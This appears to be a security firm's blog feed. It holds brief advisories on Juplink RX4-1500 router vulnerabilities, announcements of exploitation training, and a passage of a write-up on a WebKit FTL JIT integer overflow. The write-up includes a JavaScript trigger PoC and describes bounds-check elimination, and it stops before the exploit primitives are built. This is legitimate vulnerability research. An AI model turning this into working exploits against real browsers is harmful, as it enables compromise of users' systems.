
Juplink RX4-1500 Hard-coded Credential Vulnerability

18 September 2023 at 17:52

EIP-6a41336a

Hard-coded credentials exist in Juplink RX4-1500, a WiFi router. An unauthenticated attacker can exploit this vulnerability to log into the web interface or telnet service as the ‘user’ user.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-6a41336a
  • MITRE: CVE-2023-41030

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:N/C:P/I:P/A:P
  • CVSSv2 Score: 5.8

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 Hard-coded Credential Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 Command Injection Vulnerability

18 September 2023 at 17:46

EIP-9f56ea7e

A command injection vulnerability exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-9f56ea7e
  • MITRE: CVE-2023-41029

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 Command Injection Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 homemng Command Injection Vulnerability

18 September 2023 at 17:30

EIP-57838768

A command injection vulnerability exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-57838768
  • MITRE: CVE-2023-41031

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 homemng Command Injection Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 Credential Disclosure Vulnerability

18 September 2023 at 17:23

EIP-3fd79566

A credential disclosure vulnerability exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-3fd79566
  • MITRE: CVE-2023-41027

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 Credential Disclosure Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 Stack-based Buffer Overflow Vulnerability

23 August 2023 at 21:36

EIP-b5185f25

A stack-based buffer overflow exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-b5185f25
  • MITRE: CVE-2023-41028

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: August 21, 2021
  • Disclosed to public: August 23, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

Researchers who are interested in monetizing their 0-day and N-day research can work with us through our Research Sponsorship Program (RSP).

The post Juplink RX4-1500 Stack-based Buffer Overflow Vulnerability appeared first on Exodus Intelligence.

Public Mobile Exploitation Training – Fall 2023

4 August 2023 at 16:08

Mobile Exploitation Training

We are pleased to announce that the researchers of Exodus Intelligence will be providing public, in-person training on November 14, 2023, in London, England.

This 4-day course is designed to provide students with both an overview of the Android attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, binary instrumentation, and advanced exploitation of widely deployed mobile platforms.

Taught by senior members of the Exodus Intelligence Mobile Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands-on work with privilege escalation techniques within the Android kernel, mitigations, and execution migration issues, with a focus on MediaTek chipsets.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 1GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ARM ASM fluency strongly recommended.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python 2.7+.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates: November 14-17, 2023

Location: the London, UK area

Syllabus

Android Kernel

 

  • Process Management
    • General overview
    • Important structures
  • Kernel synchronization
  • Memory Management
    • General overview
    • Virtual memory
    • Memory allocators
  • Debugging environment
    • Build the kernel
    • Boot and Root the kernel
    • Kernel debugging
    • Demo
  • SELinux
  • Samsung Knox/RKP
  • Types of kernel vulnerabilities
    • Exploitation primitives
    • Kernel vulnerabilities overview
    • Heap overflows, UAF
    • Info leakage
  • [CVE-various] Mali GPU bug
    • Mali GPU
    • Vulnerability overview
    • Exploitation
  • [CVE-2020-0466] double-free vulnerability
    • Vulnerability overview
    • Exploitation
      • Type confusion to write access to globally shared memory
      • UAF which can lead to arbitrary read and write of kernel memory
  • [CVE-2021-22600] double-free vulnerability
    • Vulnerability overview
    • Exploitation – convert the double free into a use-after-free of a struct page

 

MediaTek / Exynos Baseband

  • Introduction
    • Exynos baseband overview
    • MediaTek baseband overview
  • Environment
  • Previous research
  • Analyze the modem
  • Emulation / Fuzzing
  • Rogue base station
  • Secure boot
  • MediaTek boot ROM vulnerability
    • Vulnerability overview
    • Exploitation
  • Baseband debugger
    • Use the BROM exploit to patch the TEE
    • Write the modem physical memory from EL1

 

The post Public Mobile Exploitation Training – Fall 2023 appeared first on Exodus Intelligence.

Public Browser Exploitation Training – Fall 2023

4 August 2023 at 16:05

Browser Exploitation Training

We are pleased to announce that the researchers of Exodus Intelligence will be providing public, in-person training on November 14, 2023, in London, England.

This 4-day course is designed to provide students with both an overview of the current state of the browser attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, and advanced exploitation of widely deployed browsers such as Google Chrome and Apple Safari.

Taught by senior members of the Exodus Intelligence Browser Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands-on work with privilege escalation techniques within JavaScript implementations, JIT optimizers, and rendering components.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 1GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ASM fluency.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python 2.7+.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates: November 14-17, 2023

Location: the London, UK area

Syllabus

  • JavaScript Crash Course
  • Browsers Overview
    • Architecture
    • Renderer
    • Sandbox
  • Deep Dive into JavaScript Engines and JIT Compilation
    • Detailed understanding of JavaScript engines and JIT compilation
    • Differences between major JavaScript engines (V8, SpiderMonkey, JavaScriptCore)
  • Introduction to Browser Exploitation
    • Technical aspects and techniques of browser exploitation
    • Focus on JavaScript engine and JIT vulnerabilities
  • Chrome ArrayShift case study
  • Safari NaN Speculation case study
  • JIT Compilers in depth
    • Chrome/V8 Turbofan
    • Firefox/SpiderMonkey Ion
    • Safari/JavaScriptCore DFG/FTL
  • Chrome ArrayShift case study exploitation
    • Object in-memory layout
  • Types of Arrays
  • Chrome ArrayShift case study exploitation continued
    • Garbage collection
  • Running shellcode
    • Common avenues
    • Mitigations
  • Browser Fuzzing and Bug Hunting
    • Introduction to fuzzing
    • Pros and cons of fuzzing
    • Fuzzing techniques for browsers
    • “Smarter” fuzzing
  • Current landscape
  • Hands-on exercises throughout the course
    • Understanding the environment and getting up to speed
    • Analysis and exploitation of a vulnerability

The post Public Browser Exploitation Training – Fall 2023 appeared first on Exodus Intelligence.

Shifting boundaries: Exploiting an Integer Overflow in Apple Safari

20 July 2023 at 18:45

By Vignesh Rao

Overview

In this blog post, we describe a method to exploit an integer overflow in Apple WebKit that results from incorrect range computations when optimizing JavaScript code. This research was conducted along with Martin Saar in 2020.

We show how to convert this integer overflow into a stable out-of-bounds read/write on the JavaScriptCore heap. We then show how to use the out-of-bounds read/write to create the addrof and fakeobj primitives.


Introduction

Heavy JavaScript use is common in modern web applications, which can quickly bog down performance. To tackle this issue, most web browser engines have added a Just-In-Time (JIT) compiler to compile hot (i.e. heavily used) JavaScript code to assembly. The JIT compiler relies on information collected by the interpreter when running JavaScript code.

The three major browser engines each have at least two JIT compilers: a baseline compiler that performs little to no optimization, and an optimizing compiler that applies heavy optimizations to the JavaScript code during compilation.

The WebKit browser engine, used by the Safari browser, has three JIT compilers, namely the baseline compiler, the DFG (Data Flow Graph) compiler, and the FTL (Faster Than Light) compiler. The DFG and FTL are optimizing compilers that operate on special intermediate representations of the target JavaScript source. For this post, we will be focusing on the FTL JIT compiler.

From the post Speculation in JavaScript:

The FTL JIT, or faster than light JIT, which does comprehensive compiler optimizations. It’s designed for peak throughput. The FTL never compromises on throughput to improve compile times. This JIT reuses most of the DFG JIT’s optimizations and adds lots more. The FTL JIT uses multiple IRs (DFG IR, DFG SSA IR, B3 IR, and Assembly IR).

The above-linked article, written by a WebKit developer, describes clearly various JIT concepts in JavaScriptCore, the JavaScript engine within WebKit. Its length is more than matched by the insight it provides.

Prerequisites

Before diving into the vulnerability details, we will cover a few concepts required to understand the vulnerability better. If you are already familiar with these, feel free to skip this section.

Tiers of Execution in JSC

As mentioned before, all modern browsers have at least 2 tiers of execution – the interpreter and the JIT compiler. Each tier operates on a specific representation of the code. For example, the interpreter works with the bytecode, while the JIT compilers typically work with a lower-level intermediate representation. The following are the tiers of execution in JavaScriptCore:

  • The Low Level Interpreter (LLINT): This is the first tier of execution in the engine operating on the bytecode directly. LLINT is unique as it is written in a custom assembly language called “offlineasm”. This is the slowest tier of execution but accounts for all possible cases that can arise.
  • The Baseline JIT: This is the second tier of execution. It is a template JIT compiler that compiles the bytecode into native assembly without many optimizations. It is faster than the interpreter but slower than other JIT tiers due to a lack of optimizations.
  • The Data Flow Graph (DFG) JIT: This is the third tier of execution. It lowers the bytecode into an intermediate representation called DFG IR. It then uses this IR to perform optimizations. The goal of the DFG JIT is to balance compilation time with the performance of the generated native code. Hence while performing important optimizations, it skips most other optimizations to generate code quickly.
  • The Faster Than Light (FTL) JIT: This is the fourth tier of execution and operates on the DFG IR as well as other IRs called the B3 IR and AIR. The goal of this compiler is to generate code that runs extremely fast while compromising on the speed of compilation. It first optimizes the DFG IR and then lowers it into B3 IR for more optimizations. Next, FTL lowers B3 IR into AIR which is then used to generate the native code.

The following figure highlights the tiers of execution with the code representation they use.

JavaScriptCore Tiers and Code Representations

B3 Strength Reduction Phase

The strength reduction phase for the B3 IR is a large phase that handles things like constant folding and range analysis along with the actual strength reduction. This phase is defined in the Source/JavaScriptCore/b3/B3ReduceStrength.cpp file. One of the relevant classes used in this phase is the class IntRange with two member variables m_min and m_max.

				
					// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp

class IntRange {
public:
    ....
private:
    int64_t m_min { 0 };
    int64_t m_max { 0 };
};
				
			

Objects of IntRange type are used to represent integer ranges for B3 nodes with integer values. For example, the Add node in the B3 IR represents the result of the addition of its two operands. An instance of IntRange can be used to represent the range of the Add node, meaning the range of the addition result.

The m_min and m_max members are used to hold the minimum and the maximum values of the range, respectively. For example, if there is an Add node with a result that lies between [0, 100], then the result range can be represented with an IntRange object with m_min as 0 and m_max as 100. If you have worked with v8’s Turbofan, this will be reminiscent of the Typer Phase. If the range of a node cannot be determined, then it is assigned the top range, which is a range that encompasses the minimum and the maximum values of the given type. Hence, for a node with an int32 result, the top range would be [INT_MIN, INT_MAX]. The IntRange class has a generic function called top(), which returns an IntRange instance that covers the entire range for a given type.

The IntRange class has a number of methods that allow operations on ranges. For example, the add() method takes another range as an argument and returns the result of adding the two ranges as a new range. Only specific math operations are currently supported, including bitwise left/right shifts, bitwise AND, add, sub, and mul.
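To make the range arithmetic concrete, the following is a small standalone sketch of an IntRange-style add(). It is our own simplification for illustration, not the WebKit implementation: it simply falls back to the full int32 range whenever a bound of the result would leave that range.

// Illustrative sketch only -- not the actual WebKit IntRange code.
#include <cstdint>
#include <iostream>
#include <limits>

struct IntRange {
    int64_t min;
    int64_t max;

    // Full range of a 32-bit integer, used when nothing better is known.
    static IntRange top() {
        return { std::numeric_limits<int32_t>::min(),
                 std::numeric_limits<int32_t>::max() };
    }

    // Add two ranges; if either bound of the result leaves the int32 range,
    // give up and return the top range (the conservative answer).
    IntRange add(const IntRange& other) const {
        int64_t newMin = min + other.min;   // 64-bit math cannot overflow here
        int64_t newMax = max + other.max;
        if (newMin < std::numeric_limits<int32_t>::min() ||
            newMax > std::numeric_limits<int32_t>::max())
            return top();
        return { newMin, newMax };
    }
};

int main() {
    IntRange a { 0, 100 };
    IntRange b { -5, 5 };
    IntRange c = a.add(b);
    std::cout << "[" << c.min << ", " << c.max << "]\n"; // prints [-5, 105]
}

The important property is that every supported operation must either compute a sound result range or conservatively return top; the bug discussed later is a case where this soundness is violated for shl().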

We now know how ranges are represented. But who assigns ranges to nodes? For this, there is a function called rangeFor() in the strength reduction phase.

				
// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp

IntRange rangeFor(Value* value, unsigned timeToLive = 5) {

[1]

    if (!timeToLive)
        return IntRange::top(value->type());
    switch (value->opcode()) {

[2]

    case Const32:
    case Const64: {
        int64_t intValue = value->asInt();
        return IntRange(intValue, intValue);
    }

[TRUNCATED]

[3]

    case Shl:
        if (value->child(1)->hasInt32()) {
            return rangeFor(value->child(0), timeToLive - 1).shl(
                value->child(1)->asInt32(), value->type());
        }
        break;

[TRUNCATED]

    default:
        break;
    }

    return IntRange::top(value->type());
}
				
			

The above snippet shows a stripped-down version of the rangeFor() function. This function accepts a Value, which is the B3 speak for a node, and an integer timeToLive as arguments. If the timeToLive argument is zero, then it returns the top range for the node. Otherwise, it proceeds to calculate the range of the node based on the node opcode in a switch case. For example, if it’s a constant node, then the range of that node is calculated by creating an IntRange with the min and max values set to the constant value.

For nodes with more complex functionality, like those that have operands, there arises the need to first find out the range of the operand. The rangeFor() function often calls itself recursively in such cases. At [3], for example, the range calculation for the shift left operation node is shown. The shl node has 2 operands – the value to be shifted and the value that specifies the shift amount. In the rangeFor() function, the range is only calculated if the shift amount is a constant. First, the range of the value that is to be shifted is found by calling the rangeFor() function on the operand of the shift left node. We can see that when this function is recursively called, the timeToLive value is decremented by one. This is done to avoid infinite recursion as the top value is returned when timeToLive is zero. Once the range of the operand is found, the shl operation is performed on the range by calling the shl() method of the IntRange class. The shift amount and the type of the operand are passed to the function as arguments. This function will return the range of the shl node based on the value to be shifted and the shift amount.

The rangeFor() function only supports a few nodes under specific cases, like the constant shift amount case for the shl node. For all other nodes and cases, the top value is returned.

The next question that arises is how these ranges are used. The first thought that comes to mind is that they might be used for bounds check elimination. However, that is not the case in this phase. Bounds checks are eliminated in the FTL Integer Range Optimization phase, which works with the higher-level DFG IR and has already run its course by the time we reach the B3 strength reduction phase. So let us look at where rangeFor() is used in the strength reduction phase. We see that the result of this range computation is used to simplify the following B3 nodes:

  1. CheckAdd – The arithmetic add operation with checks for integer overflows.
  2. CheckSub – The arithmetic subtract operation with checks for integer overflows.
  3. CheckMul – The arithmetic multiply operation with checks for integer overflows.

The code for simplifying the CheckSub node into its unchecked version (a simple Sub node without overflow checks) is shown in the following snippet. The other nodes are dealt with in a similar fashion.

				
// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp

[1]

IntRange leftRange = rangeFor(m_value->child(0));
IntRange rightRange = rangeFor(m_value->child(1));

[2]

if (!leftRange.couldOverflowSub(rightRange, m_value->type())) {

[3]

    replaceWithNewValue(
        m_proc.add(Sub, m_value->origin(), m_value->child(0), m_value->child(1)));
    break;
}
				
			

At [1], the ranges for the left and right operands of the CheckSub operation are computed. Then, at [2], the ranges are used to check if this CheckSub operation can overflow. If it cannot overflow, then the CheckSub is replaced with a simple Sub operation ([3]).

The same logic also applies to the CheckAdd and the CheckMul nodes. Hence, we see that the range analysis is used to eliminate the integer overflow checks from the addition, subtraction, and multiplication operations.
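To illustrate how such an overflow check on ranges can work, here is a minimal standalone sketch (our own simplification, not WebKit's couldOverflowSub()) that decides whether subtracting two int32 ranges could overflow by doing the bound arithmetic in 64 bits:

// Illustrative sketch only -- not the actual WebKit couldOverflowSub().
#include <cstdint>
#include <iostream>
#include <limits>

struct Range { int64_t min, max; };

// A subtraction a - b could overflow int32 if either extreme of the
// result range (a.min - b.max or a.max - b.min) leaves [INT32_MIN, INT32_MAX].
bool couldOverflowSub(const Range& a, const Range& b) {
    int64_t lo = a.min - b.max;   // smallest possible result
    int64_t hi = a.max - b.min;   // largest possible result
    return lo < std::numeric_limits<int32_t>::min() ||
           hi > std::numeric_limits<int32_t>::max();
}

int main() {
    // The range the FTL (incorrectly) computes for the shifted value in the
    // trigger discussed later, and the constant it is subtracted by:
    Range b     { 0, std::numeric_limits<int32_t>::max() };
    Range konst { 0x7fffffff, 0x7fffffff };
    // Both extremes of b - 0x7fffffff fit in int32, so the overflow check
    // is dropped -- even though the real range of b includes negative values.
    std::cout << couldOverflowSub(b, konst) << "\n"; // prints 0
}

Note that with an (incorrectly) computed range of [0, INT_MAX] for the left operand, such a check concludes that subtracting 0x7fffffff can never overflow, which is exactly what the vulnerability described next abuses.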

Vulnerability

The vulnerability is an integer overflow while calculating the range of an arithmetic left shift operation, in the strength reduction phase of the FTL (found in WebKit/Source/JavaScriptCore/b3/B3ReduceStrength.cpp). Let’s take a look at the following code snippet from the above-mentioned file:

				
// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp
template<typename T>
IntRange shl(int32_t shiftAmount)
{
    T newMin = static_cast<T>(m_min) << static_cast<T>(shiftAmount);
    T newMax = static_cast<T>(m_max) << static_cast<T>(shiftAmount);

    if ((newMin >> shiftAmount) != static_cast<T>(m_min))
        newMin = std::numeric_limits<T>::min();
    if ((newMax >> shiftAmount) != static_cast<T>(m_max))
        newMax = std::numeric_limits<T>::max();

    return IntRange(newMin, newMax);
}
				
			

The shl() function is responsible for calculating the range of the shift left operation. As seen in the previous section, the m_min and m_max are class variables that hold the minimum and maximum value for a “variable”. We are referring to it as a variable here for simplicity, but this range is associated with the b3 node on which this operation is being performed. This function is called when there is a left shift operation on the variable. It updates the range (the m_min, m_max pair) of the variable to reflect the state after the left shift.

The logic used is simple. The function first shifts the m_min value, which is the minimum value that the variable can have, by the shift amount to find the new minimum (stored in the newMin variable in the above snippet). It does the same with m_max. The function then performs a check for overflow: it right shifts the new value and checks that the result is equal to the old value from before the left shift. Keep in mind that the right shift is sign-extended. Suppose the original minimum before the left shift was 0x7fff_fff0; after a left shift by one it overflows into 0xffff_ffe0 (the negative number -32). However, when this is right shifted by 1 again in the overflow check, it is sign-extended, so the resulting value becomes 0xffff_fff0 (the number -16). This is not equal to the original value, so the compiler knows that it overflowed and takes the conservative approach of setting the lower bound to INT_MIN.

Even though overflow checks are performed, they are not sufficient.

Consider the example of an initial range of the input operand being [0, 0x7ffffffe] and a shift amount of 1. The function detects that the upper bound may overflow and assigns the upper bound of the result as INT_MAX. However, it never changes the lower bound, as the lower bound cannot overflow (0<<1 = 0). Thus the range of the result value is calculated as [0, INT_MAX] where INT_MAX = 0x7fffffff. However, when the left shift is performed on the upper bound (0x7ffffffe) of the input range, it may overflow, become negative, and, more importantly, become smaller than the lower bound (0) of the input range. To wit, 0x7ffffffe<<1 = 0xfffffffc = -4. Thus the actual value can become negative (as low as INT_MIN) and fall outside the range computed by the FTL JIT, which is [0, INT_MAX].
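The faulty range computation can be reproduced outside of WebKit with a few lines of standalone code. The sketch below is our own re-implementation of the logic described above (using unsigned arithmetic so the wrap-around is well defined in C++), run on the example input range [0, 0x7ffffffe] with a shift of 1:

// Standalone re-implementation of the buggy range logic described above.
// Not the WebKit code; shifts are done on uint32_t so the wrap-around is
// well defined, then reinterpreted as int32_t (what the JIT-ed code sees).
#include <cstdint>
#include <cstdio>
#include <limits>

static int32_t shl32(int32_t v, int32_t s) {
    return static_cast<int32_t>(static_cast<uint32_t>(v) << s);
}

int main() {
    int32_t min = 0, max = 0x7ffffffe;   // range of the shift's input operand
    int32_t shift = 1;

    int32_t newMin = shl32(min, shift);
    int32_t newMax = shl32(max, shift);

    // The overflow checks from shl(): shift back and compare.
    if ((newMin >> shift) != min) newMin = std::numeric_limits<int32_t>::min();
    if ((newMax >> shift) != max) newMax = std::numeric_limits<int32_t>::max();

    // Computed range: [0, INT_MAX] -- the lower bound is never widened.
    printf("computed range: [%d, %d]\n", newMin, newMax);

    // But the actual shifted upper bound wraps to a negative value (-4),
    // which lies below the computed lower bound of 0.
    printf("actual 0x7ffffffe << 1 = %d\n", shl32(max, shift));
}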

Trigger

Now that we see what the bug is, we try to trigger it. To trigger it, we need the range analysis to run on the shl opcode, which happens if we use the result of the shift in some other operation like add, sub, or mul that calls rangeFor() on its operands. Additionally, the shift amount is required to be a constant value; otherwise the top range is selected. Given the above constraints, a simple trigger can be constructed as follows:

				
function jit(idx, times){
    // Inform the compiler that this is a number
    // with range [0, 0x7fff_ffff]
    let id = idx & 0x7fffffff;
    // Bug trigger - This will overflow if id is large enough that
    // FTL thinks range is [0, INT_MAX]
    // Actual range is [INT_MIN, INT_MAX]
    let b = id << 2;

    // The sub calls `rangeFor` on its operands
    return b-1;
}

function main(){
    // JIT compile the function with legitimate value to train the compiler
    for (let k=0; k<1000000; k++) { jit(k %10); }
}

main()
				
			

Although the above PoC shows how to trigger the calculation of an incorrect range, it does not yet do anything else. Let us dump the B3 IR for the jit() function and check. In the jsc shell, the B3 IR can be dumped using the command-line argument --dumpB3GraphAtEachPhase=true while running the shell. The “Reduce Strength” phase is called a few times in the B3 pipeline, so let us dump the IR and compare the graph immediately after generating the IR and after the last call to this phase. The relevant parts of the graph are shown below.

The following is the graph immediately after generating the IR:

				
					b3      Int32 b@132 = BitAnd(b@63, $2147483647(b@131), D@30)
...
b3      Int32 b@145 = Shl(b@132, b@144, D@34)
...
b3      Int32 b@155 = Const32(-1, D@44)
b3      Int32 b@156 = CheckAdd(b@145:WarmAny, $-1(b@155):WarmAny, b@145:ColdAny, generator = 0x7f297b0d9440, earlyClobbered = [], lateClobbered = [], usedRegisters = [], ExitsSideways|Reads:Top, D@38)
				
			

The b@132 node holds the result of the bitwise AND that we added to tell the compiler that our input is an integer. The b@145 node is the result of the shl operation and the b@156 node is the result of the add operation. The original code in the PoC calls return b-1; the compiler simplifies the subtraction into an addition by the time we get to the B3 phase. The addition is represented as a CheckAdd, which means that overflow checks are conducted for this add operation during codegen.

Below is the graph after the last call to the Strength Reduction Phase:

				
					b3      Int32 b@132 = BitAnd(b@63, $2147483647(b@131), D@30)
b3      Int32 b@27 = Const32(2, D@33)
b3      Int32 b@145 = Shl(b@132, $2(b@27), D@34)
b3      Int32 b@155 = Const32(-1, D@44)
b3      Int32 b@26 = Add(b@145, $-1(b@155), D@38)
				
			

Most steps are the same except for the last line: the CheckAdd operation was reduced to a simple Add operation, which lacks overflow checks during codegen. This substitution should not have happened as this operation can theoretically overflow and hence should require overflow checks. Therefore, based on this IR we can see that the bug is triggered.

Due to the incorrect range computation in the shl() function, the CheckAdd node incorrectly determines that the subtraction operation cannot overflow and drops the overflow checks to convert the node into an ordinary Add node. This can lead to an integer overflow vulnerability in the generated code. This gives us a way to convert the range overflow into an actual integer overflow in the JIT-ed code. Next, we will see how this can be leveraged to get a controlled out-of-bounds read/write on the JavaScriptCore heap.

Exploitation

To exploit this bug, we first try to convert the possible integer overflow into an out-of-bounds read/write on a JavaScript Array. After we get an out-of-bounds read/write, we create the addrof and fakeobj primitives. We need some knowledge of how objects are represented in JavaScriptCore. However, this has already been covered in detail by many others, so we will skip it for this post. If you are unfamiliar with object representation in JSC, we urge you to check out LiveOverflow’s excellent blogs on WebKit and the “Attacking JavaScript Engines” Phrack article by Samuel Groß.

We start by covering some concepts on the DFG.

DFG Relationships

In this section, we dive deeper into how DFG infers range information for nodes. It is not necessary to understand the bug, but it allows for a deeper understanding of the concept. If you do not feel like diving too deep, then feel free to skip to the next section. You will still be able to understand the rest of the post.

As mentioned before, JSC has 3 JIT compilers: the baseline JIT, the DFG JIT, and the FTL JIT. We saw that this vulnerability lies in the FTL JIT code and occurs after the DFG optimizations are run. Since the incorrect range is only used to reduce the “checked” version of Add, Sub and Mul nodes and never used anywhere else, there is no way of eliminating a bounds check in this phase. Thus it is necessary to look into the DFG IR phases, which take place prior to the code being lowered to B3 IR, for ways to remove bounds checks.

An interesting phase for the DFG IR is the Integer Range Optimization Phase (WebKit/Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp), which attempts to optimize certain instructions based on the range of their input operands. Essentially, this phase is only executed in the FTL compiler and not in the DFG compiler, but since it operates on the DFG IR, we refer to this as a DFG phase. This phase can be considered analogous to the “Typer phase” in Turbofan, the Chrome JIT compiler, or the “Range Analysis Phase” in IonMonkey, the Firefox JIT compiler. The Integer Range Optimization Phase is fairly complex overall, therefore only details relevant to this exploit are discussed here.

In the Integer Range Optimization phase, the ranges of a variety of nodes are computed in terms of Relationship class objects. To clarify how the Relationship objects work, let @a, @b, and @c be nodes in the IR. If @a is less than @b, it is represented in the Relationship object as @a < @b + 0. Now, this phase may encounter another operation on the node @a, which results in the relationship @a > @c + 5. The phase keeps track of all such relationships, and the final relationship is computed by a logical AND of all the intermediate relationships. Thus, in the above case, the final result would be @a > @c + 5 && @a < @b + 0.

In the case of the CheckInBounds node, if the relationship of the index is greater than zero and less than the length, then the CheckInBounds node is eliminated. The following snippet highlights this.

				
// File Name: Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp
// WebKit svn changeset: 266775

case CheckInBounds: {
    auto iter = m_relationships.find(node->child1().node());
    if (iter == m_relationships.end())
        break;

    bool nonNegative = false;
    bool lessThanLength = false;
    for (Relationship relationship : iter->value) {
        if (relationship.minValueOfLeft() >= 0)
            nonNegative = true;

        if (relationship.right() == node->child2().node()) {
            if (relationship.kind() == Relationship::Equal
                && relationship.offset() < 0)
                lessThanLength = true;

            if (relationship.kind() == Relationship::LessThan
                && relationship.offset() <= 0)
                lessThanLength = true;
        }
    }

    if (DFGIntegerRangeOptimizationPhaseInternal::verbose)
        dataLogLn("CheckInBounds ", node, " has: ", nonNegative, " ", lessThanLength);

    if (nonNegative && lessThanLength) {
        executeNode(block->at(nodeIndex));
        // We just need to make sure we are a value-producing node.
        node->convertToIdentityOn(node->child1().node());
        changed = true;
    }
    break;
}
				
			

The CompareLess node sets the relationship to @a < @b + 0 where @a is the first operand of the compare operation and @b is the second operand. If the second operand is array.length, where array is any JavaScript array, then this will set the value of the @a node to be less than the length of the array. The following snippet shows the corresponding code in the phase.

				
// File Name: Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp
// WebKit svn changeset: 266775

case CompareLess:
    relationshipForTrue = Relationship::safeCreate(
        compare->child1().node(), compare->child2().node(),
        Relationship::LessThan, 0);
    break;
				
			

A similar case happens for the CompareGreater node, which can be used to satisfy the second condition for removing the check bounds node, namely if the value is greater than zero.

Our vulnerability is basically an addition/subtraction operation without overflow checks. Therefore, it would be interesting to take a look at how the range for the ArithAdd DFG node (which will be lowered to CheckAdd/CheckSub nodes when DFG is lowered to B3 IR) is calculated. This is far more complicated than the previous cases, so only the relevant parts of the code are discussed here.

The following code shows the initial logic of computing the ranges for the ArithAdd node.

				
// File Name: Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp
// WebKit svn changeset: 266775

// Handle add: @value + constant.
if (!node->child2()->isInt32Constant())
    break;

int offset = node->child2()->asInt32();

// We add a relationship for @add == @value + constant, and then we copy the
// relationships for @value. This gives us a one-deep view of @value's existing
// relationships, which matches the one-deep search in setRelationship().

setRelationship(
    Relationship(node, node->child1().node(), Relationship::Equal, offset));
				
			

As the comment says, if the statement is something like let var2 = var1 + 4, then the Relationship for var2 is initially set as @var2 = @var1 + 4. Further down, the Relationship for var1 is used to calculate the precise range for var2 (the result of the ArithAdd operation). Thus, with the code in the JavaScript snippet highlighted below, the range of the add variable, which is the result of the add operation, is determined as (4, INT_MAX). Due to the CompareGreater node, DFG already knows that num is in the range (0, INT_MAX) and therefore, after the add operation, the range becomes (4, INT_MAX).

				
function jit(num){
    if (num > 0){
        let add = num + 4;
        return add;
    }
}
				
			

Similarly, an upper range can be enforced by introducing a CompareLess node that compares with an array length as shown below.

				
function jit(num){
    let array = [1,2,3,4,5,6,7,8,9,10];
    if (num > 0){
        let add = num + 4;
        if (add < array.length){

[1]
            return array[add];
        }
    }
}
				
			

